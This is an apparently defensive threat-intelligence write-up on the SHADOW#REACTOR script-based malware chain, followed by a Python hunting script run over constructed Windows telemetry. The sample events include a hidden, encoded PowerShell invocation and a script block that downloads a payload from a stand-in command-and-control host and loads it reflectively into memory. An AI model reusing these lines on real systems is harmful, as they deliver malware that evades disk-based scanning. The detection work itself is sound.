
The campaign demonstrates how commodity scripting tools can be weaponized to bypass traditional defenses, raising the threat level for organizations relying on signature‑based detection. Understanding this chain is critical for improving detection of in‑memory and LOLBin abuse.
The emergence of SHADOW#REACTOR underscores a broader shift toward layered, script‑driven attack frameworks that exploit native Windows utilities. By chaining a minimal VBS dropper with a heavily obfuscated PowerShell stager, the threat actors capitalize on the trust placed in built‑in interpreters. This approach removes the need to ship external binaries, shrinks the malware's on‑disk hash footprint, and leans on living‑off‑the‑land binaries (LOLBins) such as wscript.exe and MSBuild.exe, which are often allow‑listed in corporate environments. Consequently, traditional perimeter defenses struggle to flag the initial stages, pushing detection responsibilities deeper into endpoint monitoring.
At the core of the campaign, the PowerShell stage retrieves architecture‑specific text files (qpwoe32.txt or qpwoe64.txt) from remote servers, validates their size, and reconstructs a .NET assembly protected by .NET Reactor. Reactor's control‑flow obfuscation, string encryption, and native code conversion dramatically increase analysis complexity and blunt static scanning. The loader is invoked reflectively, so the decoded assembly is loaded straight from memory and the payload never touches disk, while custom XOR‑based string decryption defeats heuristic pattern matching on the strings it protects. This combination of dynamic content delivery and advanced packing creates a moving target for sandbox execution and automated threat‑intel pipelines.
For defenders, the SHADOW#REACTOR model highlights the urgency of behavior‑based detection and memory‑analysis capabilities. Monitoring for anomalous PowerShell command lines (script hosts such as wscript.exe spawning PowerShell, encoded or hidden‑window invocations), unusually large in‑memory script blocks, and MSBuild.exe launched from an interpreter rather than a build tool can surface early indicators of compromise. Deploying endpoint detection and response (EDR) tooling that captures PowerShell script block logging (Event ID 4104) and module load events improves visibility into the multi‑stage chain. Threat hunts should also look for the distinctive text‑payload filenames and the characteristic Reactor decryption patterns, enabling proactive disruption of this modular, scalable attack infrastructure.
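The following detection sketch is an added example and is not code from the article or from the campaign itself. It turns the stage descriptions above (VBS dropper spawning PowerShell, the qpwoe32.txt/qpwoe64.txt text payloads, reflective assembly loading, MSBuild abuse) into rules that run over constructed Sysmon‑style process‑creation records and PowerShell 4104 script‑block records. The field names, size thresholds, hostname and sample events are assumptions for illustration; real telemetry schemas and thresholds will differ.

```python
"""Hunting rules for the SHADOW#REACTOR-style chain, run over constructed sample
events. Added example; field layout, thresholds and samples are assumptions."""
import re
from dataclasses import dataclass

# Assumed thresholds: tune to your environment's baseline.
LARGE_SCRIPT_BLOCK = 20_000   # chars; "unusually large" in-memory script
LONG_COMMAND_LINE = 1_000     # chars; long one-liners usually carry a payload

# Indicators taken from the write-up: payload filenames and reflective loading.
PAYLOAD_NAMES = re.compile(r"qpwoe(32|64)\.txt", re.I)
REFLECTIVE_LOAD = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I)
# Generic indicator: an explicit -EncodedCommand style switch.
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
INTERPRETERS = ("powershell.exe", "pwsh.exe")


@dataclass
class Finding:
    rule: str
    record_id: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _content_rules(text: str, rid: int) -> list[Finding]:
    """Rules that apply to any script text: a command line or a script block."""
    out = []
    if REFLECTIVE_LOAD.search(text):
        out.append(Finding("reflective_assembly_load", rid, "Assembly.Load from memory"))
    m = PAYLOAD_NAMES.search(text)
    if m:
        out.append(Finding("known_payload_filename", rid, m.group(0)))
    return out


def evaluate_process_create(ev: dict) -> list[Finding]:
    """Sysmon Event ID 1 style record: Image, ParentImage, CommandLine."""
    out = []
    image, parent = _basename(ev.get("Image", "")), _basename(ev.get("ParentImage", ""))
    cmd, rid = ev.get("CommandLine", ""), ev.get("RecordId", 0)
    # Stage 1 -> 2: the VBS dropper handing off to PowerShell.
    if parent in SCRIPT_HOSTS and image in INTERPRETERS:
        out.append(Finding("vbs_spawns_powershell", rid, f"{parent} -> {image}"))
    # Encoded or very long PowerShell invocations.
    if image in INTERPRETERS and (ENCODED_FLAG.search(f" {cmd} ") or len(cmd) > LONG_COMMAND_LINE):
        out.append(Finding("suspicious_powershell_cmdline", rid, f"len={len(cmd)}"))
    # LOLBin: MSBuild started by a script host or shell instead of a build tool.
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS + INTERPRETERS + ("cmd.exe",):
        out.append(Finding("msbuild_from_script_host", rid, f"{parent} -> msbuild.exe"))
    return out + _content_rules(cmd, rid)


def evaluate_script_block(ev: dict) -> list[Finding]:
    """PowerShell/Operational Event ID 4104 style record: ScriptBlockText."""
    text, rid = ev.get("ScriptBlockText", ""), ev.get("RecordId", 0)
    out = []
    if len(text) > LARGE_SCRIPT_BLOCK:
        out.append(Finding("large_script_block", rid, f"len={len(text)}"))
    return out + _content_rules(text, rid)


def hunt(events: list[dict]) -> list[Finding]:
    """Dispatch each event to the matching rule set and collect findings."""
    out = []
    for ev in events:
        if ev.get("EventType") == "ProcessCreate":
            out.extend(evaluate_process_create(ev))
        elif ev.get("EventType") == "ScriptBlock":
            out.extend(evaluate_script_block(ev))
    return out


# Constructed sample telemetry (not real campaign data); hostname is fictitious.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "RecordId": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventType": "ScriptBlock", "RecordId": 2, "ScriptBlockText":
     "$u='http://c2.example.invalid/qpwoe64.txt';$d=(New-Object Net.WebClient).DownloadString($u);"
     "if($d.Length -gt 1000){[System.Reflection.Assembly]::Load([Convert]::FromBase64String($d))}"},
    {"EventType": "ProcessCreate", "RecordId": 3, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\Public\build.xml"},
    {"EventType": "ProcessCreate", "RecordId": 4, "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe App.sln"},   # benign: IDE-driven build
    {"EventType": "ScriptBlock", "RecordId": 5, "ScriptBlockText": "x" * 25_000},
    {"EventType": "ScriptBlock", "RecordId": 6, "ScriptBlockText": r"Get-ChildItem C:\Temp"},  # benign
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] record {f.record_id}: {f.detail}")
```

Note that the benign MSBuild launch from devenv.exe and the routine Get-ChildItem block produce no findings, while the dropper hand-off, the encoded command line, the payload filename, the reflective load, the MSBuild launch from PowerShell and the oversized script block each trigger exactly one rule. In production these would be correlated by host and time window rather than scored per event.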